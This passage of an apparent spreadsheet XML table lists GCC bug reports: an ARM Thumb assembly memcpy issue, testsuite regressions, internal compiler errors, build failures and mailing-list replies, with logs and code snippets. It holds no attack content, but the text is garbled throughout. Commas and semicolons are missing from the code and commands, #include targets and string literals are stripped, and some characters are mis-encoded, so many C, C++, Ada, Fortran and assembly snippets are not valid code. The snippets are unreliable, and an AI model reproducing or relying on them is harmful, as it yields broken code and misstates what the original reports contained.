        .global _Z7_GetIDSj
        .code   16
        .thumb_func
        .type   _Z7_GetIDSj %function
_Z7_GetIDSj:
        .fnstart
.LFB0:
        .save   {r0 r1 r2 lr}
        push    {r0 r1 r2 lr}
Why do we save the volatile registers r0 r1 r2 here?
        ldr     r3 .L4
        ldr     r1 .L4+4
        ldr     r3 [r3]
        cmp     r0 r3
        bcs     .L2
        lsl     r0 r0 #1
        add     r1 r1 r0
.L2:
        mov     r2 #2
        add     r0 sp #4
        bl      memcpy
Here we copy two bytes from the table into the stack.
        add     r3 sp #4
        ldrb    r0 [r3 #1]
        ldrb    r2 [r3]
Here we copy two bytes from the stack into two registers.
        lsl     r0 r0 #8
        orr     r0 r2
Here we combine the two registers into one.
        @ sp needed for prologue
        pop     {r0 r1 r2 pc}
Here we overwrite our result (r0) with the value of r0 at the function entry.
.L5:
        .align  2
.L4:
        .word   .LANCHOR0
        .word   .LANCHOR1
With -O2 the problem vanishes (because we don't use memcpy()).</t>
  </si>
  <si>
    <t>GCC-11592</t>
  </si>
  <si>
    <t>[3.3 Regression] gcc.dg/duff-2.c fails with warning: unreachable code at beginning of switch statement</t>
  </si>
  <si>
    <t>I'm building and testing cross-compilers using http://kegel.com/crosstool
Both gcc-3.3 and gcc-ss-3_3-20030714's 'make check-gcc' produce
the following error:
FAIL: gcc.dg/duff-2.c (test for excess errors)
Excess errors:
/crosstool-0.13/build/powerpc-750-linux-gnu/gcc-3.3-glibc-2.2.5/gcc-3.3/gcc/testsuite/gcc.dg/duff-2.c:28:
warning: unreachable code at beginning of switch statement
This looks like PR 5230 but on a different platform.
I haven't tested an x86 compiler.
It also looks similar to PR 11370.</t>
  </si>
  <si>
    <t>GCC-6392</t>
  </si>
  <si>
    <t>Problems with __restrict__ type qualifier (array)</t>
  </si>
  <si>
    <t>The following source code extracted from FTensor is rejected by gcc
3.1. KCC supports this feature an array of restricted pointers. Is
this a gcc flaw or a KCC extension?
Release:
3.1 20020418 (prerelease)
Environment:
System: Linux kiste 2.4.18 #8 Sat Mar 9 15:33:15 CET 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-languages=cc++f77objc
How-To-Repeat:
source code restrict.C
struct A
{
  int* __restrict__ data[10]
}
g++ -v -c restrict.C -W -Wall
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-languages=cc++f77objc
Thread model: posix
gcc version 3.1 20020418 (prerelease)
GNU CPP version 3.1 20020418 (prerelease) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20020418 (prerelease) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20020418 (prerelease).
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/include
End of search list.
restrict.C:3: `__restrict' qualifiers cannot be applied to `int*[10]'
restrict.C:3: invalid use of `restrict'</t>
  </si>
  <si>
    <t>GCC-1186</t>
  </si>
  <si>
    <t>Compiler generates incorrect array initialization code</t>
  </si>
  <si>
    <t xml:space="preserve">From: Tom Tromey 
To: jsturm@sigma6.com
Cc: java-gnats@sourceware.cygnus.com
Subject: Re: gcj/214: Compiler generates incorrect array initialization code
Date: Sat 22 Apr 2000 14:46:55 -0700 (PDT)
 Jeff&gt; (Is there any good reason static arrays are initialized at
 Jeff&gt; runtime instead of generating an initialized data object?)
 Nobody has done the work.
 Other than that no -- it is a good idea.
 Tom
</t>
  </si>
  <si>
    <t>GCC-77270</t>
  </si>
  <si>
    <t>Flag -mprftchw is shared with 3dnow for -march=k8</t>
  </si>
  <si>
    <t>See https://gcc.gnu.org/ml/gcc/2016-05/msg00000.html
Using -march=native on a k8 platform does not add -mprfchw to the options list while using -march=k8 on a different platform does add the switch.
From Venkataramanan:
&gt;       3DNow! instruction extensions         = true
&gt;       3DNow! instructions                   = true
It has 3Dnow support.  prefetchw is available with 3dnow.
&gt;       misaligned SSE mode                    = false
&gt;       3DNow! PREFETCH/PREFETCHW instructions = false
It does not have 3DNowprefetch enabling ISA flag -mprftchw is not correct for -march=k8.
&gt;       OS visible workaround                  = false
&gt;       instruction based sampling             = false
I think  we need to file bug for this.  Need to check with Uros why the flag -mprfchw is shared with 3dnow.
To work around this issue you can use -mno-prfchw when building with -march=k8.</t>
  </si>
  <si>
    <t>GCC-63940</t>
  </si>
  <si>
    <t>C++ constexpr errors on AIX</t>
  </si>
  <si>
    <t>Created attachment 34029
Full compiler error output
/tmp/20141118/powerpc-ibm-aix7.1.0.0/libstdc++-v3/include/bits/regex_compiler.h:
424:31:   in constexpr expansion of 'std::__detail::_BracketMatcher&lt;
&gt;::_S_cache_size false false&gt;()'
/tmp/20141118/powerpc-ibm-aix7.1.0.0/libstdc++-v3/include/bits/regex_compiler.h:
425:20: error: '(int)(1ul * 8ul)' is not a constant expression
/tmp/20141118/powerpc-ibm-aix7.1.0.0/libstdc++-v3/include/bits/regex_compiler.h:
424:31:   in constexpr expansion of 'std::__detail::_BracketMatcher&lt;
&gt;::_S_cache_size false true&gt;()'
/tmp/20141118/powerpc-ibm-aix7.1.0.0/libstdc++-v3/include/bits/regex_compiler.h:
425:20: error: '(int)(1ul * 8ul)' is not a constant expression
/tmp/20141118/powerpc-ibm-aix7.1.0.0/libstdc++-v3/include/bits/regex_compiler.h:
424:31:   in constexpr expansion of 'std::__detail::_BracketMatcher&lt;
&gt;::_S_cache_size true false&gt;()'
/tmp/20141118/powerpc-ibm-aix7.1.0.0/libstdc++-v3/include/bits/regex_compiler.h:
425:20: error: '(int)(1ul * 8ul)' is not a constant expression
/tmp/20141118/powerpc-ibm-aix7.1.0.0/libstdc++-v3/include/bits/regex_compiler.h:
424:31:   in constexpr expansion of 'std::__detail::_BracketMatcher&lt;
&gt;::_S_cache_size true true&gt;()'
/tmp/20141118/powerpc-ibm-aix7.1.0.0/libstdc++-v3/include/bits/regex_compiler.h:
425:20: error: '(int)(1ul * 8ul)' is not a constant expression</t>
  </si>
  <si>
    <t>GCC-80704</t>
  </si>
  <si>
    <t>Error while invoking `string_view::string_view(const char*)` in a `constexpr` context</t>
  </si>
  <si>
    <t>#include 
    constexpr std::string_view a{a}
The code above produces the following error.
    prog.cc:3:33:   in constexpr expansion of 'std::basic_string_view(((const char*)a))'
    /opt/wandbox/gcc-head/include/c++/8.0.0/string_view:100:58: error: call to non-constexpr function 'static std::size_t std::char_traits::length(const char_type*)'
           : _M_len{__str == nullptr ? 0 : traits_type::length(__str)}
                                           ~~~~~~~~~~~~~~~~~~~^~~~~~~
On wandbox:
https://wandbox.org/permlink/JOdiWI7piKaHgA8y</t>
  </si>
  <si>
    <t>GCC-7583</t>
  </si>
  <si>
    <t>Too much SPAM and mail replies as new PRs in GNATS</t>
  </si>
  <si>
    <t>Too much spam.
Release:
N/A</t>
  </si>
  <si>
    <t>GCC-28138</t>
  </si>
  <si>
    <t>[4.2 Regression] ext/pb_ds/example/basic_map.cc etc fail: unaligned accesses at compile time</t>
  </si>
  <si>
    <t>Between June 19 and June 20 4 new fails appeared on ia64-linux all of the same type:
FAIL: ext/pb_ds/example/basic_map.cc (test for excess errors)
Excess errors:
cc1plus(7223): unaligned access to 0x2000000005d40001 ip=0x40000000006982a0
cc1plus(7223): unaligned access to 0x2000000005d40009 ip=0x40000000006982c0
cc1plus(7223): unaligned access to 0x2000000005d40011 ip=0x40000000006982c1
cc1plus(7223): unaligned access to 0x2000000005d40019 ip=0x40000000006982d1
cc1plus(7223): unaligned access to 0x2000000005d40019 ip=0x40000000006982f0
FAIL: ext/pb_ds/example/erase_if.cc (test for excess errors)
Excess errors:
cc1plus(7295): unaligned access to 0x2000000005128001 ip=0x40000000006982a0
cc1plus(7295): unaligned access to 0x2000000005128009 ip=0x40000000006982c0
cc1plus(7295): unaligned access to 0x2000000005128011 ip=0x40000000006982c1
cc1plus(7295): unaligned access to 0x2000000005128019 ip=0x40000000006982d1
cc1plus(7295): unaligned access to 0x2000000005128019 ip=0x40000000006982f0
FAIL: ext/pb_ds/regression/associative_containers.cc (test for excess errors)
Excess errors:
cc1plus(7532): unaligned access to 0x2000000005e5c001 ip=0x40000000006982a0
cc1plus(7532): unaligned access to 0x2000000005e5c009 ip=0x40000000006982c0
cc1plus(7532): unaligned access to 0x2000000005e5c011 ip=0x40000000006982c1
cc1plus(7532): unaligned access to 0x2000000005e5c019 ip=0x40000000006982d1
cc1plus(7532): unaligned access to 0x2000000005e5c019 ip=0x40000000006982f0
FAIL: ext/pb_ds/regression/trie_no_data_map_rand.cc (test for excess errors)
Excess errors:
cc1plus(7921): unaligned access to 0x200000000e674001 ip=0x40000000006982a0
cc1plus(7921): unaligned access to 0x200000000e674009 ip=0x40000000006982c0
cc1plus(7921): unaligned access to 0x200000000e674011 ip=0x40000000006982c1
cc1plus(7921): unaligned access to 0x200000000e674019 ip=0x40000000006982d1
cc1plus(7921): unaligned access to 0x200000000e674019 ip=0x40000000006982f0</t>
  </si>
  <si>
    <t>GCC-57964</t>
  </si>
  <si>
    <t>Bug box with ambiguity combined with expression if</t>
  </si>
  <si>
    <t>with Problem use Problem
package Linear_Programming is
procedure Linear_Init   
end Linear_Programming
with Ada.Containers.Vectors
package Problem is
   package Natural_Vector_Package is new Ada.Containers.Vectors (Positive Natural) -- We may need to stuff depots in there
   use Natural_Vector_Package
   Num_Customers : Positive
   Demand : Natural_Vector_Package.Vector
end Problem
with Ada.Containers.Vectors
with Ada.Containers use Ada.Containers
with Interfaces.C use Interfaces.C
package body Linear_Programming is
   package Double_Vector is new Ada.Containers.Vectors (Positive Double)
   procedure Linear_Init is
      AR : Double_Vector.Vector
      V: Integer := 1
   begin
         for I in 0 .. Num_Customers - 1 loop
            for J in I + 1 .. Num_Customers loop
               if (I = 0 and then J &gt;= V) or else I &gt;= V then
                  AR.Append (Interfaces.C.Double ((if I &gt; 0 then Demand (I) else 0) + Demand (J)) / 2.0)
               end if
            end loop
        end loop
   end Linear_Init
end Linear_Programming
gets me
| 4.8.0 (x86_64-unknown-linux-gnu) Storage_Error stack overflow or erroneous memory access|
| Error detected at linear_programming.adb:15:21                           |
compiled with gcc -c linear_programming.adb . (-gnat2012 gets rid of an error about if expression being an Ada 2012 expression but it's the same bug box either way.)</t>
  </si>
  <si>
    <t>prosfilaes</t>
  </si>
  <si>
    <t>GCC-14104</t>
  </si>
  <si>
    <t>java testsuite fails linking simple</t>
  </si>
  <si>
    <t>I am getting an error: FAIL: linking simple when executing the java testsuite.
The command that is failing works perfectly when I paste it in at the prompt.
I am compiling and testing against HEAD
The log entry follows
--------------------------
Running /build/gcj/gcc/libjava/testsuite/libjava.jar/jar.exp ...
Executing on host:
/build/gcj/objdir/i686-pc-linux-gnu/libjava/testsuite/../libtool --silent
--tag=GCJ --mode=link /build/gcj/objdir/gcc/gcj
-B/build/gcj/objdir/i686-pc-linux-gnu/libjava/ -B/build/gcj/objdir/gcc/
--encoding=UTF-8 -B/build/gcj/objdir/i686-pc-linux-gnu/./libjava/
/build/gcj/gcc/libjava/testsuite/libjava.jar/simple.jar   -no-install
--main=simple -g  -L/build/gcj/objdir/i686-pc-linux-gnu/./libjava/.libs -lm   -o
simple    (timeout = 300)
simple.java: In class `simple':
simple.java: In method `simple.main(java.lang.String[])':
simple.java:5: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
simple.java: In class `simple':
simple.java: In method `simple.main(java.lang.String[])':
simple.java:5: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: linking simple
XFAIL: running simple
hi
PASS: /build/gcj/gcc/libjava/testsuite/libjava.jar/simple.jar execution - gij test
PASS: /build/gcj/gcc/libjava/testsuite/libjava.jar/simple.jar output - gij test
testcase /build/gcj/gcc/libjava/testsuite/libjava.jar/jar.exp completed in 1 seconds
--------------------------</t>
  </si>
  <si>
    <t>GCC-5479</t>
  </si>
  <si>
    <t>(probably) invalid code causes ICE in gcc 3.0.2</t>
  </si>
  <si>
    <t>This (probably invalid) code crashes the compiler.
xpc1:~/code/valarray&gt; g++3 -v -save-temps test.cc
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.0.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --host=i386-redhat-linux
Thread model: posix
gcc version 3.0.2 20010905 (Red Hat Linux 7.1 3.0.1-3)
 /usr/lib/gcc-lib/i386-redhat-linux/3.0.2/cpp0 -lang-c++ -D__GNUG__=3 -D__GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=2 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ test.cc test.ii
GNU CPP version 3.0.2 20010905 (Red Hat Linux 7.1 3.0.1-3) (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /data/jss/linux/include
 /data/soft3/lheasoft_51/lheasoft/Linux_2.4_i686/include
 /usr/include/g++-v3
 /usr/include/g++-v3/i386-redhat-linux
 /usr/include/g++-v3/backward
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/3.0.2/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/3.0.2/cc1plus -fpreprocessed test.ii -quiet -dumpbase test.cc -version -o test.s
GNU CPP version 3.0.2 20010905 (Red Hat Linux 7.1 3.0.1-3) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0.2 20010905 (Red Hat Linux 7.1 3.0.1-3) (i386-redhat-linux)
	compiled by GNU C version 3.0.2 20010905 (Red Hat Linux 7.1 3.0.1-3).
In file included from test.cc:2:
image.h:67: Internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
Release:
gcc-3.0.2
Environment:
gnu/linux RedHat 7.2 tried using RedHat-built gcc-3.0.2 and Compaq Tru64 4.0f using stock gcc-3.0.0.</t>
  </si>
  <si>
    <t>GCC-45892</t>
  </si>
  <si>
    <t>[4.6 Regression] FAIL: gcc.dg/tree-prof/inliner-1.c</t>
  </si>
  <si>
    <t>r164986 causes gcc.dg/tree-prof/inliner-1.c to fail for non-obvious reasons.
Somehow function hot/coldness get's recomputed bogusly all over the place.</t>
  </si>
  <si>
    <t>GCC-54028</t>
  </si>
  <si>
    <t>[4.8 Regression] libada build failure when bootstrapping x86_64-w64-mingw32</t>
  </si>
  <si>
    <t>build of libada fails in gcc/ada/rts:
/SCRATCH/tmp.xipisatGtI/gcc-4.8.0/gcc-4.8.0/./gcc/xgcc -B/SCRATCH/tmp.xipisatGtI/gcc-4.8.0/gcc-4.8.0/./gcc/ -L/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/lib -L/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/mingw/lib -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/include -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/mingw/include -B/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/bin/ -B/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/lib/ -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/include -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/sys-include    -c -DIN_GCC  -W -Wall -g -O2 -fexceptions -DIN_RTS -DHAVE_GETIPINFO    \
		-iquote /SCRATCH/tmp.xipisatGtI/src/gcc-4.8.0/gcc -iquote /SCRATCH/tmp.xipisatGtI/src/gcc-4.8.0/gcc/../libgcc \
		 -iquote . -iquote .. -iquote ../.. -iquote /SCRATCH/tmp.xipisatGtI/src/gcc-4.8.0/gcc/ada -iquote /SCRATCH/tmp.xipisatGtI/src/gcc-4.8.0/gcc -I/SCRATCH/tmp.xipisatGtI/src/gcc-4.8.0/gcc/../include -I./../.. raise-gcc.c -o raise-gcc.o
raise-gcc.c: In function '__gnat_personality_seh0':
raise-gcc.c:1390:15: error: 'struct _Unwind_Exception' has no member named 'private_'
    memset (exc-&gt;private_ 0 sizeof (exc-&gt;private_))
               ^
raise-gcc.c:1390:41: error: 'struct _Unwind_Exception' has no member named 'private_'
    memset (exc-&gt;private_ 0 sizeof (exc-&gt;private_))
                                         ^
raise-gcc.c:1398:3: warning: implicit declaration of function '_GCC_specific_handler' [-Wimplicit-function-declaration]
   return _GCC_specific_handler (ms_exc this_frame ms_orig_context
   ^
raise-gcc.c:1399:14: error: '__gnat_personality_imp' undeclared (first use in this function)
     ms_disp __gnat_personality_imp)
              ^
raise-gcc.c:1399:14: note: each undeclared identifier is reported only once for each function it appears in
raise-gcc.c: At top level:
raise-gcc.c:1012:33: warning: '__gnat_personality_sj0' defined but not used [-Wunused-function]
 #define PERSONALITY_FUNCTION    __gnat_personality_sj0
                                 ^
raise-gcc.c:1059:1: note: in expansion of macro 'PERSONALITY_FUNCTION'
 PERSONALITY_FUNCTION (version_arg_t version_arg
 ^
raise-gcc.c: In function '__gnat_personality_seh0':
raise-gcc.c:1400:1: warning: control reaches end of non-void function [-Wreturn-type]
 }
 ^
make[6]: *** [raise-gcc.o] Error 1 
bootstrap configured with:
../../src/gcc-4.8.0/configure --prefix=/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0 --with-gnu-as --with-as=/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/bin/as --with-gnu-ld --with-ld=/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/bin/ld --build=x86_64-w64-mingw32 --enable-languages=cadac++fortranjavaltoobjcobj-c++ --with-gmp=/SCRATCH/tmp.xipisatGtI/install --with-mpfr=/SCRATCH/tmp.xipisatGtI/install --with-mpc=/SCRATCH/tmp.xipisatGtI/install --with-isl=/SCRATCH/tmp.xipisatGtI/install --with-cloog=/SCRATCH/tmp.xipisatGtI/install --enable-libgomp --enable-fully-dynamic-string --disable-multilib --enable-checking=release --disable-werror --with-sysroot=/x86_64-w64-trunk --disable-build-poststage1-with-cxx</t>
  </si>
  <si>
    <t>GCC-4901</t>
  </si>
  <si>
    <t>Re: Fix for PR 3862</t>
  </si>
  <si>
    <t xml:space="preserve"> Alexandre Oliva wrote:-
 &gt; On Nov  7 2001 Jason Wilkins  wrote:
 &gt; 
 &gt; &gt; What am I supposed to do?  I sent this patch to where I was told to send
 &gt; &gt; it a long time ago.
 &gt; 
 &gt; Nothing.  I apologize for the delay.  I'm currently struggling just to
 &gt; keep up with the GCC mailing lists but I have 8000 unread messages in
 &gt; my toolchain-related mail folders and I'm at least 3 weeks behind on
 &gt; average :-(
 &gt; 
 &gt; Your message was one of those marked for later handling because it
 &gt; required me to check the patch in.
 &gt; 
 &gt; Neil if you have a few spare minutes would you please go ahead and
 &gt; check Jason's patch in and close this PR?  The patch is definitely
 &gt; correct.  Thanks in advance
 Sure.  Sometime this evening.
 Neil.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-56282</t>
  </si>
  <si>
    <t>[4.8 regression] std::basic_ios broken with -std=c++11 (undefined reference)</t>
  </si>
  <si>
    <t>Simple enough:
$ echo -e '#include \n int main() { std::cout &lt;&lt; Hello World!\\n return bool(std::cout) }' | g++-4.8.0-pre9999 -x c++ - -std=c++11
/tmp/cc4QaOVU.o: In function `main':
:(.text+0x19): undefined reference to `std::basic_ios &gt;::operator bool() const'
collect2: error: ld returned 1 exit status
Broken by this commit: http://gcc.gnu.org/git/?p=gcc.gita=commitdiffh=9d8eb68081f898e225727d69da8212813f27e199
The offending commit adds the correct test operator for C++11:
+#if __cplusplus &gt;= 201103L
+      explicit operator bool() const
+      { return !this-&gt;fail() }
+#else
       operator void*() const
       { return this-&gt;fail() ? 0 : const_cast(this) }
+#endif
However std::basic_ios is explicitly instantiated in libstdc++.so (from basic_ios.tcc):
#if _GLIBCXX_EXTERN_TEMPLATE
  extern template class basic_ios
#ifdef _GLIBCXX_USE_WCHAR_T
  extern template class basic_ios
#endif
#endif
So the gcc doesn't instantiate explicit operator bool for std::basic_ios and instead tries to use the instantiation in libstdc++.so which only has the operator void*.
$ g++-4.8.0-pre9999 -v
Using built-in specs.
COLLECT_GCC=g++-4.8.0-pre9999
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-pc-linux-gnu/4.8.0-pre9999/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.8.0_pre9999/work/gcc-4.8.0-9999/configure --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.8.0-pre9999 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0-pre9999/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.0-pre9999 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.0-pre9999/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.8.0-pre9999/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.8.0-pre9999/include/g++-v4 --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec --disable-fixed-point --with-ppl --with-cloog --disable-ppl-version-check --with-cloog-include=/usr/include/cloog-ppl --enable-lto --enable-nls --without-included-gettext --with-system-zlib --enable-obsolete --disable-werror --enable-secureplt --enable-multilib --with-multilib-list=m32m64 --enable-libmudflap --disable-libssp --enable-libgomp --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.8.0-pre9999/python --enable-checking=release --disable-libgcj --enable-libstdcxx-time --enable-languages=cc++fortran --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-targets=all --with-bugurl=http://bugs.gentoo.org/ --with-pkgversion='Gentoo 4.8.0_pre9999'
Thread model: posix
gcc version 4.8.0-pre9999 20130211 (experimental) commit 37db34b1d053392f4d8899178a7f647bb70f400e (Gentoo 4.8.0_pre9999)</t>
  </si>
  <si>
    <t>GCC-26773</t>
  </si>
  <si>
    <t>[3.4 Regression] array initialization</t>
  </si>
  <si>
    <t>Program
#include 
struct A
{
  A() { printf( %p %p\n  }
  A( int j ) : i(j) { printf( %p %p\n  }
  A( const A }
  A return *this }
  A return *this }
  ~A() { printf( %p %p\n  }
  int i
  char buf[2]
}
struct B
{
  A a1
}
const A a1 = 1
int main()
{
  printf( -- 0\n )
  {
    const B b[] = { {a1} }
  }
  printf( -- 1\n )
  {
    const B b
  }
  printf( -- 2\n )
  return 0
}
give output like
0x8049b1c 0x8049b18
-- 0
0xbfd9a6a8 0xbfd9a6a4  // !!!
0xbfd9a6b8 0xbfd9a6b4  // !!!
-- 1
0xbfd9a6a8 0xbfd9a6a4
0xbfd9a6a8 0xbfd9a6a4
-- 2
0x8049b1c 0x8049b18
i.e. &amp;*this and &amp;buf[0] are differ in dtor and ctor in case of array initialization with aggregate.</t>
  </si>
  <si>
    <t>abominable-snowman</t>
  </si>
  <si>
    <t>GCC-30319</t>
  </si>
  <si>
    <t>[4.2 and 4.1 only] internal error in gfc_resolve_expr() for character parameter</t>
  </si>
  <si>
    <t>U:\vrao\fortran&gt;type gfort_bug_returns.f90
module amod
character (len=1) parameter :: aa = z bb(1) = (/aa/)
end module amod
U:\vrao\fortran&gt;gfortran -v
Using built-in specs.
Target: i386-pc-mingw32
Configured with: ../trunk/configure --prefix=/mingw --enable-languages=cfortran --with-gmp=/home/coudert/local --disable-nls --with-ld=/mingw/bin/ld --with-as=/mingw/bin/as --disable-werror --enable-bootstrap --enable-threads --host=i386-pc-mingw32 --disable-shared --enable-libgomp
Thread model: win32
gcc version 4.3.0 20061021 (experimental)
U:\vrao\fortran&gt;gfortran -c gfort_bug_returns.f90
 In file gfort_bug_returns.f90:3
end module amod
              1
 Internal Error at (1):
 gfc_resolve_expr(): Bad expression type</t>
  </si>
  <si>
    <t>GCC-5541</t>
  </si>
  <si>
    <t>[HP-UX] y.cpp:99: Internal error: Segmentation fault</t>
  </si>
  <si>
    <t>Same program compiles on Linux with gcc 2.96 on Sun Solaris 8 with gcc 2.95.
Real program is much more detailed.  Have attempted to reduce it as small as possible.
Included in attached file y.tar.gz: y.c y.ii
Sorry but it uses xerces headers etc.  V4 also from the HP website.
Release:
gcc 3.02 from http://h21007.www2.hp.com/dspp/tech/tech_TechTypeListingPage_IDX/117041031200.html
Environment:
HP 11.0 PA-RISC1.1 gcc 3.02
How-To-Repeat:
Compile as: g++ -save-temps -fpic -D_POSIX_C_SOURCE=199506 -g -DHP -D_HP_ -D__hp -I./ -I/usr/local/xerces -c y.cpp</t>
  </si>
  <si>
    <t>jwebster</t>
  </si>
  <si>
    <t>GCC-41205</t>
  </si>
  <si>
    <t>[4.5 Regression] Bootstrap broken on i686-apple-darwin9 by revision 151249</t>
  </si>
  <si>
    <t>Revision 151249 broke bootstrap on i686-apple-darwin9:
gcc  -g -fkeep-inline-functions -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -Wold-style-definition -fno-common  -DHAVE_CONFIG_H  -o cc1-dummy c-lang.o stub-objc.o attribs.o c-errors.o c-lex.o c-pragma.o c-decl.o c-typeck.o c-convert.o c-aux-info.o c-common.o c-opts.o c-format.o c-semantics.o c-ppoutput.o c-cppbuiltin.o c-objc-common.o c-dump.o c-pch.o c-parser.o i386-c.o darwin-c.o c-gimplify.o tree-mudflap.o c-pretty-print.o c-omp.o \
	  dummy-checksum.o main.o tree-browser.o libbackend.a ../libcpp/libcpp.a ../libdecnumber/libdecnumber.a ../libcpp/libcpp.a ./../intl/libintl.a /usr/lib/libiconv.dylib  ../libiberty/libiberty.a ../libdecnumber/libdecnumber.a  -L/sw/lib -lcloog -L/sw/lib -lppl_c -lppl -lgmpxx -L/opt/mpc/build/lib -lmpc -L/sw/lib -lmpfr -lgmp  
Undefined symbols:
  _strnlen referenced from:
      _make_ith_pack_parameter_name in libbackend.a(dwarf2out.o)</t>
  </si>
  <si>
    <t>GCC-41163</t>
  </si>
  <si>
    <t>[4.5 Regression] verify_gimple fails</t>
  </si>
  <si>
    <t>Attached .i file throws
--------------
$ gcc -c grep.i
grep.i: In function â€˜cmd_grepâ€™:
grep.i:9236:5: error: type mismatch in address expression
struct option[] *
struct option[41] *
options.0 = 
grep.i:9236:5: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
--------------
Using built-in specs.
Target: i586-suse-linux
Configured with: ../configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --libdir=/usr/lib --libexecdir=/usr/lib --enable-languages=cc++objcfortranobj-c++javaada --enable-checking=yes --with-gxx-include-dir=/usr/include/c++/4.5 --enable-ssp --disable-libssp --disable-plugin --with-bugurl=http://bugs.opensuse.org/ --with-pkgversion='SUSE Linux' --disable-libgcj --disable-libmudflap --with-slibdir=/lib --with-system-zlib --enable-__cxa_atexit --enable-libstdcxx-allocator=new --disable-libstdcxx-pch --enable-version-specific-runtime-libs --program-suffix=-4.5 --enable-linux-futex --without-system-libunwind --with-arch-32=i586 --with-tune=generic --build=i586-suse-linux
Thread model: posix
gcc version 4.5.0 20090820 (experimental) [trunk revision 150958] (SUSE Linux)</t>
  </si>
  <si>
    <t>jengelh</t>
  </si>
  <si>
    <t>GCC-46856</t>
  </si>
  <si>
    <t>[4.6 regression] internal compiler error in final_scan_insn breaks m68k-linux bootstrap</t>
  </si>
  <si>
    <t>Attempting to bootstrap gcc-4.6-20101204 natively on m68k-linux fails with:
